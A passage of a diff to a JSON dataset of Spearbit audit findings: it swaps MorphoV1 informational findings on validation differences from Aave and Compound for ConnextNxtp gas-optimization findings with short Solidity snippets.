"https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between the logic Note: Morpho re-implements the liquidate function as a mix of repay + supply operations on Aave executed inside _unsafeRepayLogic where needed withdraw + borrow operations on Aave executed inside _unsafeWithdrawLogic where needed From _unsafeRepayLogic (repay + supply on pool where needed) Because _unsafeRepayLogic internally call aave.supply the whole tx could fail in case the supplying has been disabled on Aave (isFrozen == true) for the _poolTokenBorrowed Morpho is not checking that the Aave borrowAsset has isActive == true Morpho do not check that remainingToRepay.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0. Trying to repay that amount to Aave would make the whole tx revert 16 Morpho do not check that remainingToSupply.rayDiv(poolIndexes[_poolToken].poolSupplyIndex) > 0. Trying to borrow that amount to Aave would make the whole tx revert From _unsafeWithdrawLogic (withdraw + borrow on pool where needed) Because _unsafeWithdrawLogic internally calls aave.borrow the whole tx could fail in case the borrowing has been disabled on Aave (isFrozen == true or borrowingEnabled == false) for the _poolTokenCol- lateral Morpho is not checking that the Aave collateralAsset has isActive == true Morpho do not check that remainingToWithdraw.rayDiv(poolIndexes[_poolToken].poolSupplyIndex) > 0. Trying to withdraw that amount from Aave would make the whole tx revert Morpho do not check that remainingToBorrow.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0. Trying to borrow that amount from Aave would make the whole tx revert More information about detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Aave\".", + "title": "TypedMemView.castTo can be optimized by using bitmasks instead of multiple shifts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "TypedMemView.castTo uses bit shifts to clear the type flag bits of a memView, instead masking can be used. Also an extra OR is used to calculate the final view.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Differences between Morpho and Aave repay validation logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between the logic Note: Morpho re-implement the repay function as a mix of repay + supply operations on Aave where needed Both Aave and Morpho are not handling ERC20 token with fees on transfer Because _unsafeRepayLogic internally call aave.supply the whole tx could fail in case the supplying has been disabled on Aave (isFrozen == true) Morpho is not checking that the Aave market has isActive == true Morpho do not check that remainingToRepay.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0. Trying to repay that amount to Aave would make the whole tx revert Morpho do not check that remainingToSupply.rayDiv(poolIndexes[_poolToken].poolSupplyIndex) > 0. Trying to supply that amount to Aave would make the whole tx revert More information about detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Aave\".", + "title": "Make domain immutable in Facets", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Domain in Connector.sol is an immutable variable, however it is defined as a storage variable in LibConnextStorage.sol. Also once initialized in DiamondInit.sol, it cannot be updated again. To save gas, domain can be made an immutable variable to avoid reading from storage.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Differences between Morpho and Aave withdraw validation logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between the logic Note: Morpho re-implement the withdraw function as a mix of withdraw + borrow operations on Aave where needed Both Aave and Morpho are not handling ERC20 token with fees on transfer Because _unsafeWithdrawLogic internally calls aave.borrow the whole tx could fail in case the borrowing has been disabled on Aave (isFrozen == true or borrowingEnabled == false) Morpho is not checking that the Aave market has isActive == true Morpho do not check that remainingToWithdraw.rayDiv(poolIndexes[_poolToken].poolSupplyIndex) > 0. Trying to withdraw that amount from Aave would make the whole tx revert Morpho do not check that remainingToBorrow.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0. Trying to borrow that amount from Aave would make the whole tx revert Note 1: Aave is NOT checking that the market isFrozen. This means that users can withdraw even if the market is active but frozen More information about detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Aave\".", + "title": "Cache router balance in repayAavePortal()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "repayAavePortal() reads s.routerBalances[msg.sender][local] twice: if (s.routerBalances[msg.sender][local] < _maxIn) revert PortalFacet__repayAavePortal_insufficientFunds(); ,! ... s.routerBalances[msg.sender][local] -= amountDebited; This can be cached to only read it once.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Differences between Morpho and Aave borrow validation logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between the logics Note: Morpho re-implement the borrow function as a mix of withdraw + borrow operations on Aave where needed Both Aave and Morpho are not handling ERC20 token with fees on transfer Morpho is not checking that the Aave market has isFrozen == false (check done by Aave on the borrow operation), users could be able to borrow in P2P even if the borrow is paused on Aave (isFrozen == true) because Morpho would only call the aave.withdraw (where the frozen flag is not checked) Morpho do not check if market is active (would borrowingEnabled == false if market is not active?) Morpho do not check if market is frozen (would borrowingEnabled == false if market is not frozen?) Morpho do not check that healthFactor > GenericLogic.HEALTH_FACTOR_LIQUIDATION_THRESHOLD Morpho do not check that remainingToBorrow.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0. Trying to borrow that amount from Aave would make the whole tx revert More information about detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Aave\".", + "title": "Unrequired if condition", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The below if condition is not required as price will always be 0. This is because if contract finds direct price for asset it returns early, otherwise if no direct price then tokenPrice is set to 0. This means for the code ahead tokenPrice will currently be 0. function getTokenPrice(address _tokenAddress) public view override returns (uint256, uint256) { ... uint256 tokenPrice = assetPrices[tokenAddress].price; if (tokenPrice != 0 && ((block.timestamp - assetPrices[tokenAddress].updatedAt) <= VALID_PERIOD)) { return (tokenPrice, uint256(PriceSource.DIRECT)); } else { tokenPrice = 0; } if (tokenPrice == 0) { ... }", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Differences between Morpho and Aave supply validation logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between the logics Note: Morpho re-implement the supply function as a mix of repay + supply operations on Aave where needed Both Aave and Morpho are not handling ERC20 token with fees on transfer Morpho is not checking that the Aave market has isFrozen == false, users could be able to supply in P2P even if the supply is paused on Aave (isFrozen == true) because Morpho would only call the aave.repay (where the frozen flag is not checked) Morpho is not checking if remainingToSupply.rayDiv( poolIndexes[_poolToken].poolSupplyIndex ) === 0. Trying to supply that amount to Aave would make the whole tx revert 19 More information about detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Aave\".", + "title": "Delete slippage for gas refund", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Once s.slippage[_transferId] is read, it's never read again. It can be deleted to get some gas refund.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Morpho should avoid creating a new market when the underlying Aave market is frozen", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "In the current implementation of Aave MorphoGovernance.createMarket the function is only check- ing if the AToken is in active state. Morpho should also check if the AToken is not in a frozen state. When a market is frozen, many operations on the Aave side will be prevented (reverting the transaction).", + "title": "Emit event at the beginning in _setOwner()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "_setOwner() maintains an extra variable oldOwner just to emit an event later: function _setOwner(address newOwner) internal { address oldOwner = _owner; _owner = newOwner; _proposedOwnershipTimestamp = 0; _proposed = address(0); emit OwnershipTransferred(oldOwner, newOwner); } If this emit is done at the beginning, oldOwner can be removed.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Differences between Morpho and Compound liquidate validation logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. Note: Morpho liquidation does not directly call compound.liquidate but acts as a repay + withdraw operation. By reviewing both logic, we have noticed that there are some differences between the logic Morpho does not check Compound seizeGuardianPaused because it is not implementing a \"real\" liquidate on compound, but it's emulating it as a \"repay\" + \"withdraw\". Morpho should anyway monitor off-chain when the value of seizeGuardianPaused changes to true. Which are the scenarios for which Compound decides to block liquidations (across all cTokens)? When this happens, is Compound also pausing all the other operations? [Open question] Should Morpho pause liquidations when the seizeGuardianPaused is true? Morpho is not reverting if msg.sender === borrower Morpho does not check if _amount > 0 Compound revert if amountToSeize > userCollateralBalance, Morpho does not revert and instead uses min(amountToSeize, userCollateralBalance) 20 More information about detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Aave\".", + "title": "Simplify the assignment logic of _params.normalizedIn in _xcall", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "When amount > 0 we should have asset != address(0) since otherwise the call would revert: if (_asset == address(0) && _amount != 0) { revert BridgeFacet__xcall_nativeAssetNotSupported(); } and when amount == 0 _params.normalizedIn is 0 which is the value passed to _xcall from xcall or xcall- IntoLocal. So we can move the calculation for _params.normalizedIn into the if (_amount > 0) { block. 90 if (_amount > 0) { // Transfer funds of input asset to the contract from the user. AssetLogic.handleIncomingAsset(_asset, _amount); // Swap to the local asset from adopted if applicable. // TODO: drop the \"IfNeeded\", instead just check whether the asset is already local / needs swap here. _params.bridgedAmt = AssetLogic.swapToLocalAssetIfNeeded(key, _asset, local, _amount, ,! _params.slippage); // Get the normalized amount in (amount sent in by user in 18 decimals). _params.normalizedIn = AssetLogic.normalizeDecimals(ERC20(_asset).decimals(), uint8(18), _amount); } gas saved according to test cases: test_Connext__bridgeFastOriginLocalToDestinationAdoptedShouldWork() (gas: -39 (-0.001%)) test_Connext__bridgeFastAdoptedShouldWork() (gas: -39 (-0.001%)) test_Connext__unpermissionedCallsWork() (gas: -39 (-0.003%)) test_BridgeFacet__xcall_worksWithPositiveSlippage() (gas: -39 (-0.003%)) test_BridgeFacet__xcall_adoptedTransferWorks() (gas: -39 (-0.003%)) test_Connext__permissionedCallsWork() (gas: -39 (-0.003%)) test_BridgeFacet__xcallIntoLocal_works() (gas: -39 (-0.003%)) test_BridgeFacet__xcall_localTokenTransferWorksWithAdopted() (gas: -39 (-0.003%)) test_Connext__bridgeFastLocalShouldWork() (gas: -39 (-0.004%)) test_BridgeFacet__xcall_localTokenTransferWorksWhenNotAdopted() (gas: -39 (-0.004%)) test_Connext__bridgeSlowLocalShouldWork() (gas: -39 (-0.005%)) test_Connext__zeroValueTransferWithEmptyAssetShouldWork() (gas: -54 (-0.006%)) test_BridgeFacet__xcall_worksIfPreexistingRelayerFee() (gas: -39 (-0.013%)) test_BridgeFacet__xcall_localTokenTransferWorksWithoutAdopted() (gas: -39 (-0.013%)) test_BridgeFacet__xcall_zeroRelayerFeeWorks() (gas: -32 (-0.014%)) test_BridgeFacet__xcall_canonicalTokenTransferWorks() (gas: -39 (-0.014%)) test_LibDiamond__initializeDiamondCut_withZeroAcceptanceDelay_works() (gas: -3812 (-0.015%)) test_BridgeFacet__xcall_zeroValueEmptyAssetWorks() (gas: -54 (-0.034%)) test_BridgeFacet__xcall_worksWithoutValue() (gas: -795 (-0.074%)) test_Connext__zeroValueTransferShouldWork() (gas: -761 (-0.091%)) Overall gas change: -6054 (-0.308%) Note, we need to make sure in future updates the value of _params.normalizedIn == 0 for any invocation of _xcall. Connext: Solved in PR 2511. Spearbit: Verified.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "repayLogic in Compound PositionsManagershould revert if toRepay is equal to zero", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The current implementation of repayLogic is correctly reverting if _amount == 0 but is not reverting if toRepay == 0. The value inside toRepay is given by the min value between _getUserBorrowBalanceInOf(_- poolToken, _onBehalf) and _amount. If the _onBehalf user has zero debt, toRepay will be initialized with zero.", + "title": "Simplify BridgeFacet._sendMessage by defining _token only when needed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "In BridgeFacet._sendMessage, _local might be a canonical token that does not necessarily have to follow the IBridgeToken interface. But that is not an issue since _token is only used when !_isCanonical.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Differences between Morpho and Compound supply validation logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between them; Compound is handling ERC20 tokens that could have transfer fees, Morpho is not doing it right now, see\"ERC20 with transfer's fee are not handled by PositionManager\". Morpho is not checking if the underlying Compound market has been paused for the supply action (see mintGuardianPaused[token]). This means that even if the Compound supply is paused, Morpho could allow users to supply in the P2P. Morpho is not checking if the market on both Morpho and Compound has been deprecated. If the deprecation flag is intended to be true for a market that will be removed in the next future, probably Morpho should not allow users to provide collateral for such a market. More information about detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Compound\".", + "title": "Using BridgeMessage library in BridgeFacet._sendMessage can be avoid to save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The usage of BridgeMessage library to calculate _tokenId, _action, and finally the formatted mes- sage involves lots of unnecessary memory writes, redundant checks, and overall complicates understanding the flow of the codebase. The BridgeMessage.formatMessage(_tokenId, _action) value passed to IOutbox(s.xAppConnectionManager.home()).dispatch is at the end with the current implementation supposed to be: 92 abi.encodePacked( _canonical.domain, _canonical.id, BridgeMessage.Types.Transfer, _amount, _transferId ); Also, it is redundant that the BridgeMessage.Types.Transfer has been passed to dispatch. it does not add any information to the message unless dispatch also accepts other types. This also adds extra gas overhead due to memory consumption both in the origin and destination domains.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Consider creating a documentation that covers all the Morpho own flags, lending protocol's flags and how they interact/override each other", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Both Morpho and Aave/Compound have their own flags to check before allowing a user to interact with the protocols. Usually, Morpho has decided to follow the logic to map 1:1 the implementation of the underlying protocol validation. There are some examples also where Morpho has decided to override some of their own internal flags For example, in the Aave aave-v2/ExitPositionsManager.liquidateLogic even if a Morpho market has been flagged as \"deprecated\" (user can be liquidated without being insolvent) the liquidator would not be able to liquidate the user if the liquidation logic has been paused.", + "title": "s.aavePool can be cached to save gas in _backLoan", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "s.aavePool can be cached to save gas by only reading once from the storage.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Missing natspec or typos in natspec", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "- Updated the natspec updateP2PIndexes replacing \"exchangeRatesStored()\" with \"exchangeRate- Stored()\" Updated the natspec _updateP2PIndexes replacing \"exchangeRatesStored()\" with \"exchangeRateStored()\" Updated the natspec for event MarketCreated replacing \"_poolToken\" with \"_p2pIndexCursor\"", + "title": "<= or >= when comparing a constant can be converted to < or > to save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "In this context, we are doing the following comparison: X <= C // or X >= C Where X is a variable and C is a constant expression. But since the right-hand side of <= (or >=) is the constant expression C we can convert <= into < (or >= into >) to avoid extra opcode/bytecodes being produced by the compiler.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Removed unused \"named\" return parameters from functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Some functions in the codebase are defining \"named\" functions parameter that are not used explicitly inside the code. This could lead to future changes to return wrong values if the \"explicit return\" statement is removed and the function returns the \"default\" values (based on the variable type) of the \"named\" parameter.", + "title": "Use memory's scratch space to calculateCanonicalHash", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "calculateCanonicalHash uses abi.encode to prepare a memory chuck to calculate and return a hash value. Since only 2 words of memory are required to calculate the hash we can utilize the memory's scratch space [0x00, 0x40) for this regard. Using this approach would prevent from paying for memory expansion costs among other things.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Consider merging the code of CompoundMath libraries and use only one", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The current codebase uses libraries/CompoundMath.sol but there's already an existing solidity library with the same name inside the package @morpho-dao/morpho-utils For better code clarity, consider merging those two libraries and only importing the one from the external pack- age. Be aware that the current implementation inside the @morpho-dao/morpho-utils CompoundMath mul and div function uses low-level yul and should be tested, while the library used right now in the code use \"high level\" solidity. the", + "title": "isLocalOrigin can be optimized by using a named return parameter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "isLocalOrigin after getting the code size of _token returns a comparison result as a bool: assembly { _codeSize := extcodesize(_token) } return _codeSize != 0; This last comparison can be avoided if we use a named return variable since the cast to bool type would automat- ically does the check for us. Currently, the check/comparison is performed twice under the hood. Note: also see issue \"Use contract.code.length\".", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Consider reverting the creation of a deprecated market in Compound", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Compound has a mechanism that allows the Governance to set a specific market as \"deprecated\". Once a market is deprecated, all the borrows can be liquidated without checking whether the user is solvent or not. Compound currently allows users to enter (to supply and borrow) a market. In the current version of MorphoGovernance.createMarket, Morpho governance is not checking whether a market is already deprecated on compound before entering it and creating a new Morpho-market. This would allow a Morpho user to possibly supply or borrow on a market that has been already deprecated by compound.", + "title": "The branching decision in AmplificationUtils._getAPrecise can be removed.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "_getAPrecise uses if/else block to compare a1 to a0. This comparison is unnecessary if we use a more simplified formula to return the interpolated value of a.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Document HeapOrdering", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Morpho uses a non-standard Heap implementation for their Aave P2P matching engine. The im- plementation only correctly sorts _maxSortedUsers / 2 instead of the expected _maxSortedUsers. Once the _maxSortedUsers is reached, it halves the size of the heap, cutting the last level of leaves of the heap. This is done because a naive implementation that would insert new values at _maxSortedUsers (once the heap is full) and shift them up, then decrease the size to _maxSortedUsers - 1 again, would end up concentrating all new values on the same single path from the leaf to the root node. Cutting off the last level of nodes of the heap is a heuristic to remove low-value nodes (because of the heap property) while at the same time letting new values be shifted up from different leaf locations. In the end, the goal this tries to achieve is that more high-value nodes are stored in the heap and can be used for the matching engine.", + "title": "Optimize increment in insert()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The increment tree.count in function insert() can be optimized. function insert(Tree storage tree, bytes32 node) internal returns (uint256) { uint256 size = tree.count + 1; ... tree.count = size; ... }", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Consider removing the Aave-v2 reward management logic if it is not used anymore", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "If the current aave-v2 reward program has ended and the Aave protocol is not re-introducing it anytime soon (if not at all) consider removing the code that currently is handling all the logic behind claiming rewards from the Aave lending pool for the supplied/borrow assets. Removing that code would make the codebase cleaner, reduce the attack surface and possibly revert in case some of the state variables are incorrectly miss configured (rewards management on Morpho is activated but Aave is not distributing rewards anymore).", + "title": "Optimize calculation in loop of dequeueVerified", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function dequeueVerified() can be optimized in the following way: (block.number - com- mitBlock >= delay) is the same as (block.number - delay >= commitBlock ) And block.number - delay is constant so it can be calculated outside of the loop. Also (x >= y) can be replaced by (!(x < y)) or (!(y > x)) to save some gas. function dequeueVerified(Queue storage queue, uint256 delay) internal returns (bytes32[] memory) { ... for (last; last >= first; ) { uint256 commitBlock = queue.commitBlock[last]; if (block.number - commitBlock >= delay) { ... } } }", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Avoid shadowing state variables", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Shadowing state or global variables could lead to potential bugs if the developer does not treat them carefully. To avoid any possible problem, every local variable should avoid shadowing a state or global variable name.", + "title": "Cache array length for loops", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Fetching array length for each iteration generally consumes more gas compared to caching it in a variable.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational aave-" + "ConnextNxtp", + "Severity: Gas Optimization Diamond.sol#L35, Multicall.sol#L16, StableSwap.sol#L90, LibDi-" ] }, { - "title": "Governance setter functions do not check current state before updates", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "In MorphoGovernance.sol, many of the setter functions allow the state to be changed even if it is already set to the passed-in argument. For example, when calling setP2PDisabled, there are no checks to see if the _poolToken is already disabled, or does not allow unnecessary state changes.", + "title": "Use custom errors instead of encoding the error message", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "TypedMemView.sol replicates the functionality provided by custom error with arguments: (, uint256 g) = encodeHex(uint256(typeOf(memView))); (, uint256 e) = encodeHex(uint256(_expected)); string memory err = string( abi.encodePacked(\"Type assertion failed. Got 0x\", uint80(g), \". Expected 0x\", uint80(e)) ); revert(err); encodeHex() is only used to encode a variable for an error message.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Emit event for amount of dust used to cover withdrawals", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Consider emitting an event that includes the amount of dust that was covered by the contract balance. A couple of ways this could be used: Trigger an alert whenever it exceeds a certain threshold so you can inspect it, and pause if a bug is found or a threshold is exceeded. Use this value as part of your overall balance accounting to verify everything adds up.", + "title": "Avoid OR with a zero variable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Boolean OR operation with a zero variable is a no-op. Highlighted code above perform a boolean OR operation with a zero variable which can be avoided: newView := or(newView, shr(40, shl(40, memView))) ... newView := shl(96, or(newView, _type)) // insert type ... _encoded |= _nibbleHex(_byte >> 4); // top 4 bits", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Break up long functions into smaller composable functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "A few functions are 100+ lines of code which makes it more challenging to initially grasp what the function is doing. You should consider breaking these up into smaller functions which would make it easier to grasp the logic of the function, while also enabling you to easily unit test the smaller functions.", + "title": "Use scratch space instead of free memory", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Memory slots 0x00 and 0x20 are scratch space. So any operation in assembly that needs at most 64 bytes of memory to write temporary data can use scratch space. Functions sha2(), hash160() and hash256() use free memory to write the intermediate hash values. The scratch space can be used here since these values fit in 32 bytes. It saves gas spent on reading the free memory pointer, and memory expansion.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Remove unused struct members", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The HealthFactorVars struct contains three attributes, but only the userMarkets attribute is ever set or used. These should be removed to increase code readability.", + "title": "Redundant checks in _processMessageFromRoot() of PolygonSpokeConnector", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function _processMessageFromRoot() of PolygonSpokeConnector does two checks on sender, which are the same: PolygonSpokeConnector.sol#L78-L82, validateSender(sender) checks sender == fxRootTunnel _setMirrorConnector() and setFxRootTunnel() set fxRootTunnel = _mirrorConnector and mirrorCon- nector = _mirrorConnector require(sender == mirrorConnector, ...) checks sender == mirrorConnector which is the same as sender == fxRootTunnel. Note: the require in _setMirrorConnector() makes sure the values can't be updated later on. So one of the checks in function _processMessageFromRoot() could be removed to save some gas and to make the code easier 104 to understand. contract PolygonSpokeConnector is SpokeConnector, FxBaseChildTunnel { function _processMessageFromRoot(..., ... require(sender == mirrorConnector, \"!sender\"); ... address sender, ... ) validateSender(sender) { } function _setMirrorConnector(address _mirrorConnector) internal override { require(fxRootTunnel == address(0x0), ...); setFxRootTunnel(_mirrorConnector); } } abstract contract FxBaseChildTunnel is IFxMessageProcessor { function setFxRootTunnel(address _fxRootTunnel) public virtual { ... fxRootTunnel = _fxRootTunnel; // == _mirrorConnector } modifier validateSender(address sender) { require(sender == fxRootTunnel, ...); _; } }", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization PolygonSpokeConnector.sol#L61-L74," ] }, { - "title": "Remove unused struct", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "There is an unused struct BorrowAllowedVars. This should be removed to improve code readability.", + "title": "Consider using bitmaps in _recordOutputAsSpent() of ArbitrumHubConnector", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function _recordOutputAsSpent() stores status via a mapping of booleans. However the equiv- alent function recordOutputAsSpent() of Arbritrum Nitro uses a mapping of bitmaps to store the status. Doing this saves gas. Note: this saving is possible because the index values are neatly ordered. function _recordOutputAsSpent(..., uint256 _index, ...) ... { ... require(!processed[_index], \"spent\"); ... processed[_index] = true; } Arbitrum version: function recordOutputAsSpent(..., uint256 index, ... ) ... { ... (uint256 spentIndex, uint256 bitOffset, bytes32 replay) = _calcSpentIndexOffset(index); if (_isSpent(bitOffset, replay)) revert AlreadySpent(index); spent[spentIndex] = (replay | bytes32(1 << bitOffset)); }", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "No validation check on prices fetched from the oracle", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Currently in the liquidateLogic function when fetching the borrowedTokenPrice and collateral- Price from the oracle, the return value is not validated. This is due to the fact that the underlying protocol does not do this check either, but the fact that the underlying protocol does not do validation should not deter Morpho from performing validation checks on prices fetched from oracles. Also, this check is done in the Compound 